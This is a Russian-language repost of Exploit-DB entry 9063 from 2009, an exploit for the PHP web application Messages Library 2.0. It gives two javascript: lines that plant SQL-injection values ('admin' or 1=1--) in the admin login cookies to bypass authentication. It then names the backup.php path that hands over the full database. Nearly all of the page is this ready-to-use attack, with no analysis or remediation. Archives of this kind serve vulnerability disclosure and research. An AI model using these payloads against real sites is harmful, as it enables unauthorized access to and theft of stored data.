- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9063
- Проверка EDB
-
- Пройдено
- Автор
- STACK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-07-01
Код:
# Messages Library 2.0 <= Arbitrary Database Download Vulnerability
########################################
#[*] Founded & Exploited by : Stack
########################################
Bypass with
javascript:document.cookie = "SaphpLesson_Name=admin' or 1=1--; path=/";
javascript:document.cookie = "SaphpLesson_Password=' or 1=1--; path=/";
After Exec
http://localhost/sms/admin/backup.php
and you got the database download
# milw0rm.com [2009-07-01]- Источник
- www.exploit-db.com
